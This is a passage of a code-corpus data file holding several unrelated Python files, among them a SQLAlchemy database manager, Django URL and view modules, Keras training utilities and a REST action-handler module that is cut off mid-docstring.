creation.
"""
if not isinstance(tables, dict):
return False # Raise Exception That Tables Are In A Wrong Format???!!!
success = True
if schema_name is not None:
self._create_schema(schema_name)
for table_name_instance in tables.items():
if self._create_table(table_name_instance[1]) is False:
success = False
break
if isinstance(views, dict):
for view_name_instance in views.items():
if self._create_view(view_name_instance[1], schema_name, config) is False:
success = False
break
return success
def _create_table(self, thistable):
"""
Create table if it doesn't exist, from a class instance.
Args:
thistable (class): Model class of the table to be created.
Returns:
created (bool/Exception): True -> Table created successfully.
False -> Table already exists.
"""
created = True
try:
thistable.__table__.create(self.__engine, checkfirst=True)
self._commit()
return created
except ProgrammingError:
self._rollback()
created = None
raise
except Exception:
self._rollback()
created = False
raise
def _create_schema(self, schema_name):
"""
Create schema if it does not exist.
Args:
schema_name (str): Schema to be created.
"""
try:
if not self.__engine.dialect.has_schema(self.__engine, schema_name):
self.__session.execute(CreateSchema(schema_name))
self._commit()
except Exception:
self._rollback()
self._reset_session()
raise
def _create_view(self, view, schema=None, config=None):
"""
Create view if it doesn't exist.
Args:
view (dict): Name and select statement for the view.
"""
viewname, vschema = view["__tablename__"].split(' ')[0], view["__schema__"].split(' ')[0]
try:
dve = SQL('NULL from {}.{}').format(Identifier(vschema),
Identifier(viewname))
veq = self.__session.query(self._sql_to_string(dve)).limit(1)
self.__session.execute(veq)
self._commit()
except ProgrammingError:
self._rollback()
like = text("information_schema.routines.routine_name like 'crosstab%'")
count = self.__session.query('* FROM information_schema.routines')
count = count.filter(like).count()
if int(count) == 0:
self._create_extension(config)
self.exschema = 'public'
else:
like = text("information_schema.routines.routine_name like 'crosstab%'")
count = self.__session.query('routine_schema FROM'
' information_schema.routines')
count = count.filter(like).limit(1)
count = self.__session.execute(count).fetchone()[0]
self._commit()
self.exschema = count
like = text("SELECT has_schema_privilege(:exschema, 'USAGE')")
like = self.__session.execute(like,
{"exschema": self.exschema}).fetchone()[0]
self._commit()
if not like:
self._grant_access(config)
viewst, raw = self._sql_to_string(view["__statement__"]), '{}.crosstab'
defsch = self._sql_to_string(SQL(raw).format(Identifier(schema)))
exsch = SQL(raw).format(Identifier(self.exschema))
self.__session.execute(viewst.replace(defsch, self._sql_to_string(exsch)))
self._commit()
except Exception:
self._rollback()
self._reset_session()
raise
def _sql_to_string(self, psql):
"""Use raw connection to convert psycopg2 SQL to string."""
pcon = self.__engine.raw_connection()
try:
pcur = pcon.cursor()
xxx = psql.as_string(pcur)
finally:
pcon.close()
return xxx
def _grant_access(self, config):
"""
Grant user access to schema containing tablefunc extension.
Args:
config (dict): Database configuration as a dictionary.
"""
confi = config.copy()
user = confi["username"]
superuse = confi.pop("supdatabase"), confi.pop("supusername"), confi.pop("suppassword")
self.__engine.dispose()
configdef = confi.copy()
configdef["username"] = superuse[1]
configdef["password"] = superuse[2]
engine = create_engine(URL(**configdef))
conn = engine.connect()
try:
conn.execute("commit")
pcon = engine.raw_connection()
try:
pcur = pcon.cursor()
conn.execute(SQL("GRANT USAGE "
"ON SCHEMA {schema} "
"TO {user};").format(schema=Identifier(self.exschema),
user=Identifier(user)).as_string(pcur))
conn.execute("commit")
finally:
pcon.close()
finally:
conn.close()
engine.dispose()
self._set_database_engine(config)
self._set_session()
    def _set_database_engine(self, config):
        """
        Create a sqlalchemy engine object.

        If the target database does not exist yet (OperationalError on the
        first connect), it is created via the superuser database and the
        engine is then rebuilt against the target database.

        Args:
            config (dict): Database configuration as a dictionary.
        """
        confi = config.copy()
        superuse = confi.pop("supdatabase"), confi.pop("supusername"), confi.pop("suppassword")
        self.__engine = create_engine(URL(**confi))
        try:
            try:
                if self.__engine is not None:
                    conn = self.__engine.connect()
                    conn.close()
            except OperationalError:
                # Target database missing: connect to the superuser database
                # and create it, then point the engine back at the target.
                configdef = confi.copy()
                configdef["database"] = superuse[0]
                self.__engine.dispose()
                self.__engine = create_engine(URL(**configdef))
                try:
                    conn = self.__engine.connect()
                    try:
                        conn.execute("commit")
                        # NOTE(review): database name interpolated directly;
                        # assumed to come from trusted local configuration.
                        conn.execute("CREATE DATABASE %s;" % config["database"])
                    finally:
                        conn.close()
                except OperationalError:
                    self.__engine.dispose()
                    raise
                self.__engine.dispose()
                self.__engine = create_engine(URL(**confi))
        except ProgrammingError:
            # NOTE(review): bare re-raise — this handler is a no-op and
            # could be removed.
            raise
def _create_extension(self, config):
"""Create extension which requires superuser privileges."""
confi = config.copy()
superuse = confi.pop("supdatabase"), confi.pop("supusername"), confi.pop("suppassword")
try:
if confi["username"] is not superuse[1]:
self.__engine.dispose()
configdef = confi.copy()
configdef["username"] = superuse[1]
configdef["password"] = superuse[2]
engine = create_engine(URL(**configdef))
conn = engine.connect()
try:
conn.execute("commit")
conn.execute("CREATE EXTENSION IF NOT EXISTS tablefunc;")
conn.execute("commit")
finally:
conn.close()
engine.dispose()
self._set_database_engine(config)
self._set_session()
else:
conn = self.__engine.connect()
try:
conn.execute("commit")
conn.execute("CREATE EXTENSION IF NOT EXISTS tablefunc;")
conn.execute("commit")
finally:
conn.close()
except ProgrammingError:
raise
def _set_session(self):
"""Create a new sqlalchemy session."""
self.__session = sessionmaker(bind=self.__engine)()
def _reset_session(self):
"""
Close the previous session and start a new one.
Raises:
DatabaseError.ConnectionError
"""
retries = self.__no_of_retries
while retries > 0:
if not self._is_session_valid():
self._close()
self._set_session()
else:
break
retries -= 1
else:
raise DatabaseError.ConnectionError("Connection to database not available!")
def _is_session_valid(self):
"""Check whether the session is valid or not."""
_valid = False
try:
if self.__session is not None:
self.__session.query('1').scalar()
_valid = True
except Exception: # !!!!????!!!!????
self.__session = None
raise
return _valid
def _commit(self):
"""Commit changes to the database."""
if self.__session is not None:
self.__session.commit()
def _rollback(self):
"""Rollback the changes."""
if self.__session is not None:
self.__session.rollback()
def _close(self):
"""Close the existing session."""
if self.__session is not None:
self._rollback()
self.__session.close()
    def _merge(self, _object):
        """Perform sqlalchemy.session.merge().

        Copies the state of *_object* onto the persistent instance with the
        same identity, loading it if necessary.
        """
        self.__session.merge(_object)
    def _add(self, _object):
        """Perform sqlalchemy.session.add().

        Stages *_object* for INSERT on the next commit/flush.
        """
        self.__session.add(_object)
    def _merge_by_query(self, obj_dict):
        """Perform merge based on the query dictionary.

        obj_dict keys:
            class: mapped model class to query.
            query_dict: filter_by() keyword arguments identifying the row.
            instance: new object carrying the desired attribute values.

        If no matching row exists the instance is added as-is; otherwise all
        non-primary-key attributes listed in ``instance.attributes`` are
        copied onto the persistent row and ``obj_dict['instance']`` is
        replaced by that row.

        Raises:
            AttributeError: when the instance's class does not declare the
            ``attributes`` / ``p_key`` class variables.
        """
        _res = self.__session.query(obj_dict["class"]).filter_by(**obj_dict["query_dict"]).first()
        if _res is None:
            self._add(obj_dict["instance"])
        else:
            if hasattr(obj_dict["instance"], 'attributes') and \
                    hasattr(obj_dict["instance"], 'p_key'):
                for attr in obj_dict["instance"].attributes:
                    if attr not in obj_dict["instance"].p_key:
                        setattr(_res, attr, getattr(obj_dict["instance"], attr))
                # updating the instance
                obj_dict["instance"] = _res
            else:
                raise AttributeError("Class variable (attributes / p_key) not set for %s" %
                                     (obj_dict["instance"],))
    def last_table_ordered_column(self, obj):
        """
        Perform query for the first row of table ordered by column.

        Args:
            obj (dict): {'class': mapped model, 'query': raw ORDER BY
                expression passed through sqlalchemy ``text()``}.

        Returns:
            instance: first row when ordered descending (i.e. the "latest"
            row for the given column), or None for an empty table.
        """
        instance = self.__session.query(obj["class"]).order_by(desc(text(obj["query"]))).first()
        return instance
    def _insert(self, object_arr):
        """
        Perform insert within a transaction.

        Args:
            object_arr (list): List of objects to be inserted.
                [{
                    "instance": <object_instance_1>,
                    "mode": "<add/merge/merge_by_query>"
                },
                {
                    "instance": <object_instance_2>,
                    "mode": "<add/merge/merge_by_query>"
                }].

        Returns:
            None

        Raises:
            DatabaseError.ConnectionError: if the session cannot be restored.
            NotImplementedError: for an unknown "mode" value.
        """
        _object = None
        try:
            # Make sure we have a usable session before starting the batch.
            if not self._is_session_valid():
                self._reset_session()
            for obj in object_arr:
                # Plain add is the default when no mode was given.
                obj.setdefault("mode", "add")
                _object = obj["instance"]
                if obj["mode"] == "merge":
                    self._merge(_object)
                elif obj["mode"] == "add":
                    self._add(_object)
                elif obj["mode"] == "merge_by_query":
                    self._merge_by_query(obj)
                else:
                    raise NotImplementedError("Invalid mode: {mode}".format(mode=obj["mode"]))
            self._commit()
        except DatabaseError.ConnectionError:
            raise
        except Exception:
            # Undo the partial transaction and start a clean session before
            # propagating the original error.
            self._rollback()
            self._reset_session()
            raise
class Helpers(object):
    """
    Define various utility functions related to database operation.

    Methods:
        * schema_ref: Concatenates schema to table name
        * timestamp_to_iso_format: Converts a Unix timestamp to ISO-8601
    """
    @staticmethod
    def schema_ref(schema, table):
        """
        Concatenate schema name to table name.

        Args:
            schema (str): Schema name.
            table (str): Table name.

        Returns:
            (str): Schema_name.Table_name
        """
        return '{}.{}'.format(schema, table)
    @staticmethod
    def timestamp_to_iso_format(timestamp):
        """
        Convert timestamp, if existing, to UTC ISO format.

        Args:
            timestamp: Seconds since the epoch (int-convertible), or None.

        Returns:
            str or None: ISO-8601 formatted UTC date-time.
        """
        if timestamp is None:
            return None
        moment = datetime.utcfromtimestamp(int(timestamp))
        return moment.isoformat()
|
993,584 | 231e787830b51f72e8c613fa48d85f3c95f653a4 | from django.conf.urls import url,include
from . import views
urlpatterns = [
    # NOTE: most patterns are unanchored at the end (no '$'), so ordering
    # matters — the specific 'dashboard/worker/...' routes must stay above
    # the bare 'dashboard/worker/' catch-all or they would never match.
    url(r'^dashboard/client/', views.client_home, name='client_home'),
    url(r'^dashboard/worker/(?P<pk>[0-9]+)$',views.service_expand,name='service_expand'),
    url(r'^dashboard/worker/profile/', views.update_worker, name='update_worker'),
    url(r'^dashboard/worker/add/', views.add, name='add'),
    url(r'^dashboard/worker/', views.service_provider_home, name='service_provider_home'),
    url(r'^dashboard/transactions/', views.trans, name='trans'),
    url(r'^dashboard/bookings/', views.bookings, name='bookings'),
    url(r'^dashboard/generate_report/',views.generate_report, name='generate_report'),
]
|
993,585 | eadacb2885e02086ffce686c64719102439418f9 | valor = float(input('Digite o valor do produto desejado: '))
desconto = valor - (valor * (5 / 100))
print('O produto com desconto saiu de R${:.2f} por R${:.2f}.'.format(valor, desconto))
|
993,586 | 655a4b74a3ac446b4d086d42d26be2d3050be7a0 | # Validation of type annotations
import re
from typing import Match, Optional
def GetEmailMatch(email) -> Optional[Match]:
    """Match *email* against the ``<local>@example.com`` pattern.

    Returns the Match object (group 1 is the local part) or None when the
    address is not an example.com address.  BUG FIX: the annotation was a
    bare ``Match``, but ``re.match`` returns None on failure.
    """
    return re.match(r'([^@]+)@example\.com', email)
|
993,587 | 7548f5f7aa1d1ba3f4ae63358236b611ae6363dc | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : Mike
# @Contact : yinhuaxi@geotmt.com
# @Time : 2020/1/7 14:22
# @File : __init__.py.py
|
993,588 | 49000cb0aaf831008ab6330b5ff045d43760411a | import requests
# Fetch and print one user record from the gen-net API by name.
URL = 'https://gen-net.herokuapp.com/api/users/{}'
name = input('Digite Nome: ')
endpoint = URL.format(name)
response = requests.get(endpoint)
print(response.json())
|
993,589 | 5f81a0ffa36ef2ba60bc2bb369ae79454d36f8e5 | import csv
# Write a small tab-separated table to one.csv, then read it back and print
# each row (csv.reader always yields every field as a string).
header = ['S.No', 'Name', 'Mark']
data_rows = [[1, 'A', 2], [2, 'B', 3]]
with open('one.csv', 'w', newline='') as out_file:
    tsv_writer = csv.writer(out_file, delimiter='\t')
    tsv_writer.writerow(header)       # single row from a flat list
    tsv_writer.writerows(data_rows)   # writerows expects a nested list
with open('one.csv', newline='') as in_file:
    for record in csv.reader(in_file, delimiter='\t'):
        print(record)
|
993,590 | 56309534101618ab143e1bf5b67b85f7ddbc1e11 | from tensorflow.keras.preprocessing.image import ImageDataGenerator
import matplotlib.pyplot as plt
from tensorflow.keras.models import *
def init_generators(train_data_dir, validation_data_dir, img_width, img_height, batch_size_train, batch_size_val):
    """Build the training and validation image generators.

    Training images are rescaled to [0, 1] and augmented (rotation, shifts,
    zoom, horizontal flip); validation images are only rescaled so metrics
    reflect untouched data.

    Args:
        train_data_dir: Directory with one sub-folder per class (train split).
        validation_data_dir: Directory with one sub-folder per class (validation split).
        img_width: Width images are resized to.
        img_height: Height images are resized to.
        batch_size_train: Batch size of the training generator.
        batch_size_val: Batch size of the validation generator.

    Returns:
        (train_generator, val_generator): iterators yielding shuffled RGB
        batches with binary class labels.
    """
    train_datagen = ImageDataGenerator(
        rescale=1. / 255,
        rotation_range=20,
        width_shift_range=0.2,
        height_shift_range=0.2,
        zoom_range=0.2,
        horizontal_flip=True,
        fill_mode='nearest')
    # No augmentation for validation — only the same rescaling as training.
    val_datagen = ImageDataGenerator(rescale=1. / 255)
    train_generator = train_datagen.flow_from_directory(
        train_data_dir,
        target_size=(img_width, img_height),
        batch_size=batch_size_train,
        color_mode='rgb',
        class_mode='binary',
        shuffle=True)
    val_generator = val_datagen.flow_from_directory(
        validation_data_dir,
        target_size=(img_width, img_height),
        batch_size=batch_size_val,
        color_mode='rgb',
        class_mode='binary',
        shuffle=True)
    return train_generator, val_generator
def _plot_metric(history, train_key, val_key, title, ylabel):
    """Plot one train/validation metric pair from a Keras History object."""
    plt.plot(history.history[train_key])
    plt.plot(history.history[val_key])
    plt.title(title)
    plt.ylabel(ylabel)
    plt.xlabel('Epoch')
    plt.legend(['Train', 'Test'], loc='upper left')
    plt.show()
def plot(history):
    """Show accuracy and loss curves for a completed training run.

    The original duplicated the plotting code for each metric; the shared
    steps now live in ``_plot_metric``.

    Args:
        history: Keras History object with 'accuracy'/'val_accuracy' and
            'loss'/'val_loss' series in ``history.history``.
    """
    print(history.history.keys())
    # Plot training & validation accuracy values
    _plot_metric(history, 'accuracy', 'val_accuracy', 'Model accuracy', 'Accuracy')
    # Plot training & validation loss values
    _plot_metric(history, 'loss', 'val_loss', 'Model loss', 'Loss')
def save_model_structure_to_json(path, model):
    """Write the model architecture (``model.to_json()``) to *path*.

    Only the structure is saved, not the weights.  BUG FIX: the original
    left the file handle open if ``to_json()`` or ``write()`` raised; the
    ``with`` block guarantees it is closed.
    """
    with open(path, "w") as json_file:
        json_file.write(model.to_json())
def load_model_structure_from_json(path):
    """Rebuild a (weightless) Keras model from a JSON structure file.

    BUG FIX: the original left the file handle open on a read error; the
    ``with`` block guarantees it is closed.
    """
    with open(path, "r") as json_file:
        loaded_model_json = json_file.read()
    return model_from_json(loaded_model_json)
def freeze(model):
    """Mark every layer of *model* as non-trainable.

    Nested functional models are descended into recursively so their inner
    layers are frozen as well.
    """
    for child in model.layers:
        child.trainable = False
        if isinstance(child, Model):
            freeze(child)
def unfreeze(model):
    """Mark every layer of *model* as trainable.

    Nested functional models are descended into recursively so their inner
    layers are unfrozen as well.
    """
    for child in model.layers:
        child.trainable = True
        if isinstance(child, Model):
            unfreeze(child)
|
993,591 | 0dde5ab567d8f55ca868c9b3fe3dd81c5e961591 | """Post views."""
#Django
from django.shortcuts import render
# Utilities
from datetime import datetime
# Hard-coded demo feed entries used until posts are backed by a real model.
# Timestamps are computed once at import time, not per request.
posts =[
    {
        'title': 'Mont Blanc',
        'user': {
            'name':'Yésica Cortés',
            'picture': 'https://picsum.photos/60/60/?image=1027',
        },
        'timestamp': datetime.now().strftime('%b %dth, %Y - %H:%M hrs'),
        'photo': 'https://i.picsum.photos/id/1036/200/200.jpg?hmac=Yb5E0WTltIYlUDPDqT-d0Llaaq0mJnwiCUtxx8RrtVE',
    },
    {
        'title': 'Via Láctea',
        'user': {
            'name':'Christian Vander Henst',
            'picture':'https://picsum.photos/60/60/?image=1005',
        },
        'timestamp': datetime.now().strftime('%b %dth, %Y - %H:%M hrs'),
        'photo': 'https://i.picsum.photos/id/903/200/200.jpg?hmac=lxHKyjlQqAkKyuVGkgUCO_jdWkg3osj3nTuULFHZxH8',
    },
    {
        'title': 'Nuevo auditorio',
        'user': {
            'name':'Uriel (thepianastist)',
            'picture':'https://picsum.photos/60/60/?image=883',
        },
        'timestamp': datetime.now().strftime('%b %dth, %Y - %H:%M hrs'),
        'photo': 'https://i.picsum.photos/id/1076/200/200.jpg?hmac=KTOq4o7b6rXzwd8kYN0nWrPIeKI97mzxBdWhnn-o-Nc',
    },
]
def list_posts(request):
    """Render the feed template with the in-memory posts list."""
    context = {'posts': posts}
    return render(request, 'feed.html', context)
993,592 | 607bedbda9ff4333f93798acbcd736421bfc7d29 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""ReST actions handlers."""
# System imports
import sys
import abc
import logging
import datetime
import importlib
from django.db import models
from django.conf import settings
from django.utils.timezone import utc
from django.db.models.query import QuerySet
from django.urls import reverse
from rest_framework.authtoken.models import Token
# Project imports
from .handlers import PostMixin, GetMixin, RestAPIBasicAuthView, RestAPINoAuthView
from .request_data import RequestData
from .response_data import ResponseData
from .serializer_object import SerializerModelDataObject
from draalcore.rest.model import ModelContainer, locate_base_module, ModelsCollection, AppsCollection
from draalcore.exceptions import DataParsingError
from draalcore.middleware.current_user import get_current_request
from draalcore.rest.base_serializers import UserModelSerializer
from draalcore.middleware.login import AutoLogout
logger = logging.getLogger(__name__)
def get_module(module):
    """Return the named python module, importing it on first use.

    BUG FIX: the original used
    ``getattr(sys.modules, module, importlib.import_module(module))`` —
    ``sys.modules`` is a dict, so attribute lookup never finds a module,
    and the getattr default was evaluated eagerly, meaning import_module
    ran on every call regardless.
    """
    return sys.modules.get(module) or importlib.import_module(module)
class BaseAction(abc.ABC):
    """
    Base class for action execution.
    Attributes:
    -----------
    ACTION
       Name of action.
    MODEL
       Model class. This should be defined for all actions that are derived from CreateAction or
       EditAction base action class. It is not needed for CreateAction or EditAction as those
       classes are valid for all models as such. Only if there is a need to override the
       default behavior, custom class implementation is needed.
    ALLOWED_METHODS
       Allowed HTTP methods under which action can be called.
    LINK_ACTION
       True if action URL can be directly called. Useful, for example, for downloading media files.
    """
    ACTION = None
    MODEL = None
    ALLOWED_METHODS = []
    LINK_ACTION = False
    def __init__(self, request_obj, model_cls):
        """
        Parameters:
        -----------
        request_obj: RequestObject
           Request object.
        model_cls: Model
           Model class for the request.
        """
        self._request_obj = request_obj
        self._model_cls = model_cls
    @classmethod
    def create(cls, request_obj):
        # Factory: instantiate the action bound to its declared MODEL class.
        return cls(request_obj, cls.MODEL)
    @property
    def request_obj(self):
        # Read-only access to the request object supplied at construction.
        return self._request_obj
    @property
    def model_cls(self):
        # Read-only access to the model class supplied at construction.
        return self._model_cls
    @classmethod
    def match_action(cls, action):
        # True when this class implements the named action.
        return cls.ACTION == action
    def serialize_user(self, user, auth_data=False):
        # Serialize a user; with auth_data=True also attach session expiry
        # and the user's API token (refreshing its timestamp).
        data = UserModelSerializer(user).data
        if auth_data:
            data['expires'] = AutoLogout.expires()
            data.update(self._get_token(user))
        return data
    def _get_token(self, user):
        # Fetch (or create) the user's token as {'token': <key>}.
        token, created = Token.objects.get_or_create(user=user)
        if not created:
            # Update the created time of the token to keep it valid
            token.created = datetime.datetime.utcnow().replace(tzinfo=utc)
            token.save()
        return {'token': token.key}
class CreateAction(BaseAction):
    """Create a new model item; applicable to every model."""
    ACTION = 'create'
    ALLOWED_METHODS = ['POST']
    DISPLAY_NAME = 'Create'
    def execute(self, *args, **kwargs):
        """Entry point — delegates to _execute so subclasses can add hooks."""
        return self._execute(*args, **kwargs)
    def _execute(self):
        """Create a new model item from the request's data parameters."""
        params = self.request_obj.data_params
        return self.model_cls.objects.create_model(**params)
class CreateActionWithParameters(CreateAction):
    """Create action where the required input parameters are declared up front.

    ``PARAMETERS`` maps each required data key to ``(validator, spec)``.
    """
    PARAMETERS = {}
    def _validate_parameters(self):
        """Validate data parameters, raise DataParsingError on error"""
        data = self.request_obj.data_params
        missing = [key for key in self.PARAMETERS if key not in data]
        if missing:
            raise DataParsingError('Following data items are missing: {}'.format(', '.join(missing)))
        for key, params in self.PARAMETERS.items():
            params[0].validate_type(key, data.get(key), params[1])
    def execute(self, *args, **kwargs):
        """Validate the declared parameters, then create the item."""
        self._validate_parameters()
        return self._execute(*args, **kwargs)
class EditAction(BaseAction):
    """Edit an existing model item; applicable to every model."""
    ACTION = 'edit'
    ALLOWED_METHODS = ['POST', 'PATCH']
    def _execute(self, model_obj):
        """Apply the request's data parameters to *model_obj*."""
        return self.model_cls.objects.edit_model(model_obj, **self.request_obj.data_params)
    def execute(self):
        """Look up the target item by its URL id, then edit it."""
        item_id = self.request_obj.kwargs['id']
        try:
            model_obj = self.model_cls.objects.get(id=item_id)
        except self.model_cls.DoesNotExist:
            raise DataParsingError('ID {} does not exist'.format(item_id))
        return self._execute(model_obj)
class DeleteAction(EditAction):
    """Delete an existing model item; applicable to every model."""
    ACTION = 'delete'
    ALLOWED_METHODS = ['POST']
    DISPLAY_NAME = 'Delete'
    LINK_ACTION = True
    def _execute(self, model_obj):
        """Soft-delete: flip the item's visibility instead of removing the row."""
        model_obj.deactivate()
class AbstractModelGetAction(BaseAction):
    """HTTP GET action for models (no item id in the URL)."""
    ALLOWED_METHODS = ['GET']
    @abc.abstractmethod
    def execute(self):
        """Must be defined in the implementing class"""
class AbstractModelItemGetAction(EditAction):
    """HTTP GET action for a single model item (id present in the URL).

    Inherits EditAction's item lookup; subclasses implement _execute.
    """
    ACTION = None
    ALLOWED_METHODS = ['GET']
    @abc.abstractmethod
    def _execute(self, model_obj):
        """Must be defined in the implementing class"""
def get_action_response_data(obj, url_name, resolve_kwargs, method=None):
    """Return serialized action URL data for an action class or instance."""
    action_path = reverse(url_name, kwargs=resolve_kwargs)
    return {
        'url': f'{settings.SITE_URL}{action_path}',
        'display_name': getattr(obj, 'DISPLAY_NAME', obj.ACTION),
        'method': method or obj.ALLOWED_METHODS[0],
        'direct': obj.LINK_ACTION
    }
class ActionMapper(object):
    """Utility wrapper class for model actions."""
    @classmethod
    def serialize_actions(cls, request_obj, model_cls, cls_options, method, resolver, include_link_actions=False):
        """
        Serialize actions available for model or model item.
        Parameters
        ----------
        request_obj
           Request object.
        model_cls
           Model class for the request object.
        cls_options:
           List of action base classes for model and model item based action processing.
        method
           HTTP method.
        resolver
           URL resolver, should contain 'name' and 'kwargs' keys for URL reverse method.
        include_link_actions
           If True, only those model actions are serialized that have LINK_ACTION attribute set to value True.
           Default value is False.
        Returns
        -------
        dict
           Available actions.
        """
        classes = cls.action_classes(request_obj, model_cls, cls_options, method)
        # Is inclusion of all actions required in URL parameters?
        all_actions = request_obj.has_url_param('actions', 'all')
        # Include actions that do not require input parameters
        if not all_actions and include_link_actions:
            classes = [item for item in classes if item.LINK_ACTION]
        data = {}
        for item in classes:
            # The resolver kwargs dict is reused (mutated) for every action.
            resolver['kwargs']['action'] = item.ACTION
            data[item.ACTION] = get_action_response_data(item, resolver['name'], resolver['kwargs'], method)
        return data
    @classmethod
    def action_classes(cls, request_obj, model_cls, cls_options, method):
        """
        Return BaseAction inherited action classes for specified model.
        Parameters
        ----------
        request_obj
           Request object.
        model_cls
           Model class for the request object.
        cls_options:
           List of action base classes for model and model item based action processing. If available action
           classes are to be retrieved for model ID, then the second item in the list is used as reference class
           otherwise the fist item in the list is used. All actions that get accepted to the output list must
           have been derived from this reference class.
        method
           HTTP method that each action class within output list should support.
        Returns
        -------
        list
           Action classes for model.
        """
        module = locate_base_module(model_cls, 'actions')
        target_base_cls = cls_options[0] if 'id' not in request_obj.kwargs else cls_options[1]
        try:
            classes = []
            loaded_mod = get_module(module)
            # NOTE(review): the loop variable shadows the classmethod's
            # ``cls`` parameter; harmless because ``cls`` is not used after
            # the loop, but worth renaming in a future cleanup.
            for name, cls in loaded_mod.__dict__.items():
                # Class must be inherited from the target class
                if target_base_cls and isinstance(cls, type) and issubclass(cls, target_base_cls):
                    # Class must not be imported
                    if cls.__module__ != target_base_cls.__module__:
                        # The model must match that of the target
                        if cls.MODEL.__name__ == model_cls.__name__ and method in cls.ALLOWED_METHODS:
                            if cls.ACTION not in getattr(model_cls, 'DISALLOWED_ACTIONS', []):
                                classes.append(cls)
        except ImportError:
            # App has no 'actions' module; fall through with base/special
            # actions only.
            pass
        # Include the base class if it has action name specified
        if target_base_cls and target_base_cls.ACTION and method in target_base_cls.ALLOWED_METHODS:
            if target_base_cls.ACTION not in getattr(model_cls, 'DISALLOWED_ACTIONS', []):
                classes.append(target_base_cls)
        # Include delete action as special action if id present
        if 'id' in request_obj.kwargs and method in DeleteAction.ALLOWED_METHODS:
            if DeleteAction.ACTION not in getattr(model_cls, 'DISALLOWED_ACTIONS', []):
                classes.append(DeleteAction)
        return classes
    @classmethod
    def create(cls, request_obj, model_cls, action, cls_options, method):
        """
        Create BaseAction inherited action object instance for specified request.
        Parameters
        ----------
        request_obj
           Request object.
        model_cls
           Model class for the request object.
        action
           Action name.
        cls_options:
           Action base classes list for model and model item based action processing.
        method
           HTTP method.
        Returns
        -------
        Object
           CreateAction | EditAction instance.
        Raises
        ------
        DataParsingError
           Action not supported.
        """
        # Find action classes for model
        classes = cls.action_classes(request_obj, model_cls, cls_options, method)
        # Now find the correct action class
        for cls_item in classes:
            if cls_item.match_action(action):
                return cls_item(request_obj, model_cls)
        raise DataParsingError('Action {} not supported for method {}'.format(action, method))
class ModelActionMixin(GetMixin, PostMixin):
    """Actions mixin handling HTTP GET and HTTP POST queries for model related actions."""
    def _get(self, request_obj):
        """Apply HTTP GET action to application model."""
        return self._execute_action(request_obj, [AbstractModelGetAction, AbstractModelItemGetAction], 'GET')
    def _post(self, request_obj):
        """Apply HTTP POST action to application model."""
        return self._execute_action(request_obj, [CreateAction, EditAction], 'POST')
    def _execute_action(self, request_obj, action_cls, method):
        """Execute model action and serialize its result.

        Falls through to a plain message response when the model does not
        declare ``serializer_fields`` (i.e. it is not exposed via the API).
        """
        action = request_obj.kwargs['action']
        model_cls = ModelContainer(request_obj.kwargs['app'], request_obj.kwargs['model']).model_cls
        # Model definition must be valid
        if hasattr(model_cls, 'serializer_fields'):
            ser_obj = SerializerModelDataObject.create(request_obj, model_cls)
            # Locate action class and execute
            action_obj = ActionMapper.create(request_obj, model_cls, action, action_cls, method)
            obj = action_obj.execute()
            # Serialize data as response
            if obj and isinstance(obj, (models.Model, QuerySet)):
                request_obj.set_queryset(obj)
                obj = ser_obj.serialize().data
            return ResponseData(obj)
        msg = "{} action for '{}' is not supported via the API".format(action, request_obj.kwargs['model'])
        return ResponseData(message=msg)
class AppActionMixin(GetMixin, PostMixin):
    """Actions mixin handling HTTP GET and HTTP POST queries for application related actions."""
    def _get(self, request_obj):
        """Apply HTTP GET action to application."""
        return self._execute_action(request_obj, 'GET')
    def _post(self, request_obj):
        """Apply HTTP POST action to application."""
        return self._execute_action(request_obj, 'POST')
    def _execute_action(self, request_obj, method):
        """Execute application level action."""
        # Find application config object
        app = AppsCollection().get_app(request_obj.kwargs['app'])
        # Find the actual action object
        action_obj = app.get_action_obj(request_obj, method)
        # Execute
        obj = action_obj.execute()
        # Serialize returned data if its queryset or model item
        if obj and isinstance(obj, (models.Model, QuerySet)):
            # Queryset model
            # NOTE(review): ``obj.model`` assumes a QuerySet; a bare Model
            # instance has no ``.model`` attribute — confirm app actions
            # only return querysets here.
            model_cls = obj.model
            # Create serializer based on model
            ser_obj = SerializerModelDataObject.create(request_obj, model_cls)
            request_obj.set_queryset(obj)
            # Serialize queryset data
            obj = ser_obj.serialize().data
        return ResponseData(obj)
class ActionsSerializer(object):
    """
    Actions serializer interface. Lists available actions for (app_label, model) tuple. If URL contains
    'actions' parameter with value 'all', then all available actions are listed. By default only HTTP POST
    actions are listed.
    Attributes:
    -----------
    request_obj
       RequestData instance.
    """
    def __init__(self, request_obj):
        self.request_obj = request_obj
    def serialize(self):
        """
        Interface for serializing application and/or model related actions.
        Returns
        -------
        dict
           Action details.
        """
        # Model-level when the URL names a model, application-level otherwise.
        return self._serialize_model_actions() if 'model' in self.request_obj.kwargs else self._serialize_app_actions()
    def _serialize_app_actions(self):
        """
        Serialize actions that are application related (not tight to any specific model).
        Returns
        -------
        dict
           Keys describe the name of action and corresponding value the details of the action.
        """
        app = AppsCollection().get_app(self.request_obj.kwargs['app'])
        return app.serialize_actions(get_action_response_data, self.request_obj.kwargs.get('noauth', False))
    def _serialize_model_actions(self):
        """
        Serialize actions that are related to a model.
        Returns
        -------
        dict
           Action details.
        """
        resolver = {
            'name': 'rest-api-model-action',
            'kwargs': {
                'app': self.request_obj.kwargs['app'],
                'model': self.request_obj.kwargs['model']
            }
        }
        get_base_actions = []
        if 'id' in self.request_obj.kwargs:
            resolver['name'] = 'rest-api-model-id-action'
            resolver['kwargs'].update({'id': self.request_obj.kwargs['id']})
            # First item needs to be None as the base class for actions search is based on the
            # second item when model ID is present.
            get_base_actions.append(None)
            get_base_actions.append(AbstractModelItemGetAction)
        else:
            get_base_actions.append(AbstractModelGetAction)
        fn = ActionMapper.serialize_actions
        model_cls = ModelContainer(self.request_obj.kwargs['app'], self.request_obj.kwargs['model']).model_cls
        # List HTTP POST actions by default
        actions = fn(self.request_obj, model_cls, [CreateAction, EditAction], 'POST', resolver)
        # All actions are requested, include also HTTP GET actions
        if self.request_obj.has_url_param('actions', 'all'):
            actions.update(fn(self.request_obj, model_cls, get_base_actions, 'GET', resolver, include_link_actions=True))
        return actions
    @classmethod
    def serialize_model_id_actions(cls, model_cls, model_id):
        """
        Class method to serialize actions for specified model and model ID. Only those actions are serialized
        that require HTTP POST method with no input data and HTTP GET method that have LINK_ACTION set to True.
        This function will be called automatically when model item gets serialized. The purpose is that only
        those actions will be listed that can be called without specifying input data as part of the HTTP call
        (as those allow simple UI side implementation).
        Parameters
        ----------
